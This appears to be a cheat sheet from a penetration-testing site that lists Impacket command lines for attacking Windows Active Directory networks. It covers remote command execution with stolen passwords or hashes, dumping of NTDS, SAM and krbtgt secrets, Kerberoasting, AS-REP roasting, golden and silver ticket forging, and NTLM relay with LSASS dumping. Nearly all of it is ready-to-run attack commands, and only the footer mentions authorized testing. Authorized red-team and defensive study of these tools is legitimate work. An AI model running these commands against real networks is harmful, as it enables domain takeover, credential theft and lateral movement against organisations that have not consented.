Quick Reference
Impacket Quick Reference
Hackers Manifest - hackersmanifest.com
Python tools for Windows network protocols and Active Directory attacks.
🖥️ Remote Execution
| PSExec | psexec.py DOMAIN/user:pass@TARGET |
| PSExec w/ hash | psexec.py DOMAIN/user@TARGET -hashes :NTLM |
| WMIExec | wmiexec.py DOMAIN/user:pass@TARGET |
| SMBExec | smbexec.py DOMAIN/user:pass@TARGET |
| ATExec | atexec.py DOMAIN/user:pass@TARGET "cmd" |
| DCOMExec | dcomexec.py -object MMC20 DOMAIN/user:pass@TARGET |
PSExec=Service | WMI=No file | DCOM=MMC/Shell
🔐 Credential Dumping
| Remote secrets | secretsdump.py DOMAIN/user:pass@TARGET |
| With hash | secretsdump.py DOMAIN/user@TARGET -hashes :NTLM |
| NTDS only (DC) | secretsdump.py DOMAIN/admin:pass@DC -just-dc |
| Specific user | secretsdump.py ... -just-dc-user krbtgt |
| From local SAM | secretsdump.py -sam SAM -system SYSTEM LOCAL |
| From NTDS | secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL |
🎫 Kerberos Attacks
| Get TGT | getTGT.py DOMAIN/user:pass -dc-ip DC_IP |
| TGT w/ hash | getTGT.py DOMAIN/user -hashes :NTLM -dc-ip DC_IP |
| Kerberoast | GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -request |
| AS-REP Roast | GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP |
| Request ST | getST.py -spn cifs/TARGET -impersonate admin DOMAIN/user:pass |
| Use ticket | export KRB5CCNAME=admin.ccache |
| Pass ticket | psexec.py -k -no-pass DOMAIN/admin@TARGET |
🎟️ Ticket Operations
| Golden Ticket | ticketer.py -nthash KRBTGT_HASH -domain-sid SID -domain DOMAIN admin |
| Silver Ticket | ticketer.py -nthash SVC_HASH -domain-sid SID -domain DOMAIN -spn cifs/target admin |
| kirbi → ccache | ticketConverter.py ticket.kirbi ticket.ccache |
| ccache → kirbi | ticketConverter.py ticket.ccache ticket.kirbi |
| Describe ticket | describeTicket.py ticket.ccache |
📁 SMB Operations
| SMB client | smbclient.py DOMAIN/user:pass@TARGET |
| List shares | shares (interactive) |
| Use share | use SHARE (interactive) |
| Get file | get filename (interactive) |
| Put file | put local remote (interactive) |
| SMB server | smbserver.py SHARE /path/to/share |
| SMBv2 server | smbserver.py -smb2support SHARE /path |
📂 LDAP & AD Queries
| Get AD users | GetADUsers.py DOMAIN/user:pass -dc-ip DC_IP -all |
| Find delegation | findDelegation.py DOMAIN/user:pass -dc-ip DC_IP |
| LDAP search | ldapsearch -x -H ldap://DC -b "DC=domain,DC=local" |
| lookupsid | lookupsid.py DOMAIN/user:pass@TARGET |
| samrdump | samrdump.py DOMAIN/user:pass@TARGET |
🔄 NTLM Relay
| Basic relay | ntlmrelayx.py -t TARGET |
| Relay to LDAP | ntlmrelayx.py -t ldap://DC --escalate-user USER |
| Dump secrets | ntlmrelayx.py -t TARGET --dump-lsass |
| Execute cmd | ntlmrelayx.py -t TARGET -c "whoami" |
| Target list | ntlmrelayx.py -tf targets.txt |
| Responder | responder -I eth0 |
🔧 Other Useful Tools
| Registry | reg.py DOMAIN/user:pass@TARGET query -keyName HKLM\\... |
| Services | services.py DOMAIN/user:pass@TARGET list |
| RPC map | rpcdump.py TARGET |
| MSSQL client | mssqlclient.py DOMAIN/user:pass@TARGET |
| Kerberos info | getKerberoastableUsers.py DOMAIN/user:pass@DC |
Generated from Hackers Manifest | For authorized security testing only | hackersmanifest.com